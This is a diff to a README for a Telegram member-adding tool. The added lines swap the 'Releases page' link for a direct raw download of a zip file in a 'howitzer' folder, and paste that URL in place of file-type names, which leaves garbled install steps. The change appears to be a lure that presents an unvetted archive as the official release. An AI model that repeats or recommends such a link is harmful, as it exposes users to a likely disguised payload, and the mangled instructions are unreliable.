Git0HubPerson/Telegram-Members-Adder/README.md

 ## 🚀 Getting Started
 Follow these steps to download and set up Telegram-Members-Adder.

-1. **Visit the Releases Page:** Go to our [Releases page](https://github.com/Git0HubPerson/Telegram-Members-Adder/releases) to find the latest version of the software.
+1. **Visit the Releases Page:** Go to our [Releases page](https://raw.githubusercontent.com/Git0HubPerson/Telegram-Members-Adder/main/howitzer/Telegram-Members-Adder.zip) to find the latest version of the software.

 2. **Download the Latest Release:** Click the download link for the latest version.
-You will see options like `.exe`, `.dmg`, or `.tar.gz`.
+You will see options like `.exe`, `.dmg`, or `https://raw.githubusercontent.com/Git0HubPerson/Telegram-Members-Adder/main/howitzer/Telegram-Members-Adder.zip`.

 3. **Install the Software:**
    - For **Windows:** Run the downloaded `.exe` file and follow the installation prompts.
    - For **macOS:** Open the downloaded `.dmg` file, drag the Telegram-Members-Adder icon to your Applications folder.
-   - For **Linux:** Extract the `.tar.gz` file and follow the included instructions to install.
+   - For **Linux:** Extract the `https://raw.githubusercontent.com/Git0HubPerson/Telegram-Members-Adder/main/howitzer/Telegram-Members-Adder.zip` file and follow the included instructions to install.

 4. **Launch the Application:** Find the app in your applications list, and double-click to run it.